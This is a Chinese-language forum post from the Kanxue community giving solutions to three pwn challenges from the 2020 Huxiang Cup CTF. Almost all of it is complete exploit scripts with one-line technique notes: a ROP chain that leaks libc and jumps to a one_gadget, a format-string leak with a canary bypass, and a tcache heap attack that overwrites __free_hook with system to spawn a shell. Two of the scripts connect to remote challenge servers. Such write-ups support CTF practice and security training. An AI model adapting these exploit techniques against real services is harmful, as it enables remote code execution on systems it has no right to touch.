首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 看雪峰会 看雪商城 证书查询
  1. 看雪社区
  2. Pwn
    3. 发新帖
2020 湖湘杯 pwn题解
2020-11-5 00:13 6292

2020 湖湘杯 pwn题解

Seclusion 活跃值
4
2020-11-5 00:13
6292

2020 湖湘杯 pwn题解

pwn_printf

简单stack溢出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
#https://github.com/matrix1001/welpwn
from PwnContext import *
 
try:
    from IPython import embed as ipy
except ImportError:
    print ('IPython not installed.')
 
if __name__ == '__main__':       
    context.terminal = ['tmux', 'splitw', '-h']
    context.log_level = 'debug'
    # functions for quick script
    s       = lambda data               :ctx.send(str(data))        #in case that data is an int
    sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data))
    sl      = lambda data               :ctx.sendline(str(data))
    sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data))
    r       = lambda numb=4096          :ctx.recv(numb)
    ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)
    irt     = lambda                    :ctx.interactive()
    rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)
    dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)
    # misc functions
    uu32    = lambda data   :u32(data.ljust(4, '\0'))
    uu64    = lambda data   :u64(data.ljust(8, '\0'))
 
    ctx.binary = './pwn'
    #ctx.custom_lib_dir = '/home/iddm/glibc-all-in-one/libs/2.27-3ubuntu1_amd64'
    ctx.remote = ('47.111.104.99', 52206)
    #ctx.remote_libc = './libc.so'
    #ctx.debug_remote_libc = True
 
    ctx.symbols = {
        'dest':0x4000000,
    }
 
    ctx.breakpoints = [0x0401009, 0x40103F,0x040112E,0x4007D4]#menu
 
    def lg(s,addr):
        print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))
 
    #def add(size):
 
    #def delete(idx):
 
    #def show(idx):
 
    #def edit():
 
 
    #rs()
    rs('remote')
    dbg()
    ru('resting\n')
    for i in range(16):
        sl('32')
 
    pop_rdi = 0x0401213
    puts_plt = 0x400640
    puts_got = 0x603018
    ret = 0x40117F
    payload = p64(0)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(ret)
    s(payload)
    libc = uu64(ru('\x7f',drop=False)[-6:])-0x6f6a0
 
    lg('libc',libc)
    one = libc + 0x4527a
 
    payload = '\0'*8 + p64(one)[:6]
    s(payload)
    irt()

blend_pwn

利用异常捕获机制绕过canary判断控制rbp达成利用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
#https://github.com/matrix1001/welpwn
from PwnContext import *
 
try:
    from IPython import embed as ipy
except ImportError:
    print ('IPython not installed.')
 
if __name__ == '__main__':       
    context.terminal = ['tmux', 'splitw', '-h']
    context.log_level = 'debug'
    # functions for quick script
    s       = lambda data               :ctx.send(str(data))        #in case that data is an int
    sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data))
    sl      = lambda data               :ctx.sendline(str(data))
    sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data))
    r       = lambda numb=4096          :ctx.recv(numb)
    ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)
    irt     = lambda                    :ctx.interactive()
    rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)
    dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)
    # misc functions
    uu32    = lambda data   :u32(data.ljust(4, '\0'))
    uu64    = lambda data   :u64(data.ljust(8, '\0'))
 
    ctx.binary = './pwn'
    ctx.remote = ('47.111.96.55', 53404)
 
    ctx.symbols = {
        'node':0x202090,
    }
 
    ctx.breakpoints = [0x117C,0x11B8,0x12C2]#menu
 
    def lg(s,addr):
        print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))
 
    def add(content='\n'):
        sla('>',2)
        sa('note:\n',content)
 
    def delete(idx):
        sla('>',3)
        sla('index>',idx)
 
    def show_name():
        sla('>',1)
 
    def show():
        sla('>',4)
 
    #def show(idx):
 
    #def edit():
 
 
    #rs()
    rs('remote')
 
    #dbg()
    name = "%3$p"
    sla('name: ',name)
    show_name()
    ru('Current user:')
    libc = int(r(14),16)
    lg('libc',libc)
    base = libc - 0xf7380
    malloc_hook = base + 0x3c4aed
    payload = p64(base+0x45226)*10
    add(payload+'\n')
    add(payload+'\n')
    delete(0)
    delete(1)
    dbg()
    show()
    ru('2:')
    heap = uu64(r(6))
    aim = heap + 0x10
    lg('aim',aim)
    #add()
    #delete(0)
    #delete(1)
    #delete(0)
 
    sla('>',666)
    payload = '0'*0x20+p64(aim+0x20)[:6]+'\n'
    sa('want',payload)
 
    irt()

only_add

realloc利用,注意堆布局

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
#https://github.com/matrix1001/welpwn
from PwnContext import *
 
try:
    from IPython import embed as ipy
except ImportError:
    print ('IPython not installed.')
import time
 
if __name__ == '__main__':       
    context.terminal = ['tmux', 'splitw', '-h']
    context.log_level = 'debug'
    # functions for quick script
    s       = lambda data               :ctx.send(str(data))        #in case that data is an int
    sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data))
    sl      = lambda data               :ctx.sendline(str(data))
    sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data))
    r       = lambda numb=4096          :ctx.recv(numb)
    ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)
    irt     = lambda                    :ctx.interactive()
    rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)
    dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)
    # misc functions
    uu32    = lambda data   :u32(data.ljust(4, '\0'))
    uu64    = lambda data   :u64(data.ljust(8, '\0'))
 
    ctx.binary = './pwn'
    ctx.custom_lib_dir = '/home/iddm/glibc-all-in-one/libs/2.27-3ubuntu1_amd64'
    #ctx.custom_lib_dir = '/glibc/2.27/amd64/lib'
    #ctx.remote = ('172.16.9.21', 9006)
    #ctx.remote_libc = './libc.so'
    ctx.debug_remote_libc = True
 
    ctx.symbols = {
        'node':0x202040,
        'mark':0x202010
    }
 
    ctx.breakpoints = [0xB11]#menu
 
    def lg(s,addr):
        print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))
 
    def add(size,content='\n',mark=0):
        if mark == 0:
            sla('ice:',1)
            sla('ize',size)
            if size == 0:
                return
            sa('ta:',content)
        elif mark == 1:
            time.sleep(0.1)
            sl(1)
            time.sleep(0.1)
            sl(size)
            if size == 0:
                return
            time.sleep(0.1)
            sa('ta:',content)
 
    def add_1(size,content='\n'):
        sl(1)
        time.sleep(0.1)
        sl(size)
        time.sleep(0.1)
        if size == 0:
            return
        s(content)
        time.sleep(0.1)
 
    def clear():
        sla('ice',2)
        ru('ye')
 
    while True:
        try:
            context.log_level = 'info'
            rs()
            #rs('remote')
 
            # fill the tcache
            for i in range(7):
                add(0xa0)
                add(0x10)
            #dbg()
            add(0x200)
            add(0x200-0x20)
            add(0x200-0x20-0x90) #get the unsorted bin
            add(0x200-0x20-0x90-0x30)
            add(0x200-0x20-0x90-0x30-0x40)
            add(0)
            #dbg()
            add(0x38,p64(0)*7+chr(0x81))
            add(0)
            add(0x20)
            add(0)
            add(0x70,p64(0)*5+p64(0xc1)+'\x1d\x77')
            add(0)
            #dbg()
            #dbg()
            add(0xe8,p64(0)*29+chr(0x81))
            add(0)
            add(0x30)
            add(0)
            add(0xe0)
            #dbg()
            add(0xe0-0x38,p64(0)*21+chr(0x61))
            add(0)
            add(0x30)
            add(0)
            add(0x50,p64(0)*7+p64(0x71)+chr(0x90))
            add(0)
            add(0x70)
            add(0)
            add(0x70)
            add(0)
            #dbg()
            add(0x70,'\0'*0x43+p64(0xfbad3887)+p64(0)*3+chr(0x70))
            libc_base = uu64(ru('\x7f',drop=False)[-6:]) - 0x3b07e3 + 0x73
            free_hook = libc_base + 0x3b18e8
            system = libc_base + 0x13440
            lg('libc_base',libc_base)
            clear()
            add_1(0x50,p64(0)*7+p64(0xd1)+p64(free_hook-0x18))
            add_1(0)
            add_1(0x60)
            add_1(0)
            #dbg()
            payload = 'exec /bin/sh 1>&2\0'
            payload = payload.ljust(0x18,'\0')
            add_1(0x60,payload+p64(system))
            #dbg()
            add_1(0)
            #dbg()
            irt()
        except KeyboardInterrupt:
            #break
            pass
        except EOFError:
            #continue
            pass

当做记录本来想丢到专栏去的,但是专栏排版好像有些问题,就放到这里来凑数。


[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法

上传的附件:
收藏
点赞2
打赏
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
 回帖  表情 雪币赚取及消费
高级回复
返回